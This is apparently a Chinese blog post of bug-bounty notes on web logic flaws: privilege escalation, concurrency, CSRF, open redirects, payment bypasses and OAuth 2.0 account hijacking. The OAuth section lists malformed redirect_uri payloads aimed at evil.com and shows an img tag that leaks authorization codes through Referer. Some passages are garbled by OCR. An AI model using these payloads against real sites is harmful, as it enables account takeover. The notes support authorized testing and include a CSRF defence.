web技巧

bp 	autorepeater使用==>检测ssrf 未授权 越权

越权(认证登录)=>(找回密码,改绑手机号)(访问后台,访问功能页面) id换参数 1=>0

未授权访问(redis)=>需登录=>绕开登录 id不传参

并发

bp turbo intruder
%s	
%31	%0a
短信验证
请求发送短信到我手机号-》服务器
接收手机号码
XX
调用API接口-》
成功《--短信服务
XXX  
记录176792996541min

点赞/访问/关注/商品

基础漏洞csrf挖掘

1.对身份认证的理解:
2.两种请求方式的csrf漏洞:
	get请求发起的csrf:

*这个漏洞的思想就是利用s*漏洞让别人在访问该站点的某个地方的时候突然掉线,而有交互的地方就是在论坛、评论、留言板等地方。*

在企业src上,
该漏洞为中危
总结:*对于此类CS*漏洞我们应该多关注可以多用户进行交互的地方,然后观察自己的个人信息是否可以可控,进而
继续挖掘。*

不受限制的资源调用

1.输入个人信息,如姓名、身份证、联系电话等。如果按照我们普通的挖掘路,此处可能存在的漏洞是不是有SQL XSS、越权查看他人提交信息、CSR等等,其实此处可以利用一种新的思路
称之为不受限制的资源调用。

2.我们先输入自己的真实姓名+身份证号,然后把身份证号的最后一位7,改成5,进行提交,此时可以发现,提示我们需要输入正确的身份证号码,同时Bp设有任何数据包请求,判断此处是前端做了校验,校验用户输入的身份证号是否能够与规则匹配。同时可在文件中找到相应规则,此处校验不通过会返回false阻止我们进行提交。

3.假如我此时是一名开发者,我需要给我的APP加上实名验证功能,那么我可以直接去向最上层的那个机构申请接口吗?不能,因为我不是企业,而且我也不是属于它直系应用的开发者。我只能向他的下级,也就是腾讯、阿里、百度这样的企业去申请AP虹接口,同时这些公司会把我们提交的数据,提交给最上层的那个机构,并且根据返回的数据,给我们返回的数据。也就是身份证号验证成功,或者二要素验证不一致。我们再来说一下直系应用与企业的区别,直系应用去申请二要素验证,一般是不用花钱的。

文件上传html嵌套xss语句

1.在我们文件上传的时候很有很可能会遇见无法上传马子的情况,我相信很多人在这个时候都会直接不管这一个上传点,然后在企业src里面这样的上传点可以试试上传一个html文件配合xss语句,导致一个挂黑页弹窗的危害,在众测里面达到了
中危的标准
.html->js-->函数

2

url重定向漏洞

=>跟oAuth联用

测试方法与出现位置
方法1:直接观看get请求注意参数
Url=  redirect=  next=  r=  u=
方法2:使用Burp查看包含url跳转的et历史清就Q6
出现地方:登录框的时候抓数据包直接参加get参数

四舍五入的支付漏洞

代金卷使用并发漏洞

时间校验漏洞

首单签约vip绕过

限制购买逻辑漏洞

漏洞描述:
很多厂商都会搞一些活动,在享受优惠的时候,会标上用户只能购买一次或者只能充值一次的条件,但是这种地方也是
会有漏洞产生的:。就是程序员在开发的时候会忽悠掉用户可以在不支付前多次创建订单还突破这个限制.
如:仅限购买一台或者首单优惠这样的地方

OAuth2.0

OAuth(Open Authorization,开放授权)是一个开放标准,允许用户授权第三方网站访问他们存储在另外的服务提供者上的信息,而不需要将用户名和密码提供给第二方网站或分享他们数据的所有内容。

攻击方法

CSRF绑定劫持
攻击者抓取认证请求构造恶意url,并欺骗服务器已登录的用户点击(例如通过QQ消息/微信消息网站站内信/邮件等方式)
这时只要用户点击一下恶意url就会触发认证,认证成功后用户的帐号会同攻击者的帐号绑定到一起,攻击者即可通过OAuth登录绑定的账号。
个人信息 绑定邮箱 微信 QQ->q4.com?XXXXX(qq)
利用=>跳转url url=>换为个人,我们会获取qq/..的code 获取用户个人信息

防御方法:
这个就是客户端的问题
OAuth2.0提供了state参数用于防御CSRF,
认证服务器在接收到state参数会按原样返回给redirect uri.
客户端收到该参数并验证与之前生成的值是否一致即可.
案例:请搜索我的文章-漏洞挖据之*书OAuth2.0认证缺陷CSRF-第三方帐号快捷登录授权劫持

redirect_url绕过授权劫持
畸形url绕过方法
http/auth.app.com=认证服务器保存的回调地址
evil.com=恶意域名

http://auth.app.com.evil.com(http://auth.app.com.evil.com/
http://evil.com?http://auth.app.com
http://auth.app.com@evil.com
http://evil.com?@http://auth.app.com
http://auth.app.com@evik"om
http://evil.com[http://auth.app.com](http://auth.app.com/)
http://evil.com:[http://auth.app.com](http://auth.app.com/)
http://evil.com.auth.app.com
http://evil.com:@http://auth.app.com
http://evil.com#http://auth.app.com
http://evil.com auth.app.com
/evil.com?http://auth.app.com
//evil.com?http://auth.app.com
利用畸形的绕过方法核心就一点:让认证服务器的回调地址感觉是正常的请求

跨域绕过
例子1:网站存在一个任意url跳转漏洞,可利用该漏洞构造以下向量
https://api.weibo.com/oauth2/authorize?client_id=1881139526&redirect_uri=http://auth.app.com/redirect.php?url=http://evil.com
认证服务器将凭证通过GET方法发送到redirect.php,这时redirect.php执行url跳转,访问http://evil.com,攻击者在evil.com记录日志,并从请求头中的referer字段提取出该凭证,即可通过该凭证进行授权登录.


例子2:利用跨域请求从referer偷取oken
在我们不能绕过redirect uri的判断规则时,我们可以使利用跨域请求从referer中偷取token.redirect_ uri限制死了,只能为app.com,然而网站有地方我们可以操作例如:http:/app.com/article/1.html中允许用户发表
文章,并且插入图片之类的

那么我可以在文章中嵌入来自evil.com的外部图片.
例如这样:<img src="evi1.com/csrf_test.jpg">
用户授权完了以后的请求可能是:http:/app.com/article/1.html?code=NCNCXCXCXCXCXCX然后跳转到这个文章接着加载外部图片然后evil.com记录日志,并从请求头中的referer字段提取出该凭证,即可通过该凭证进行授权登录,

SG常用方法

1.社工

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注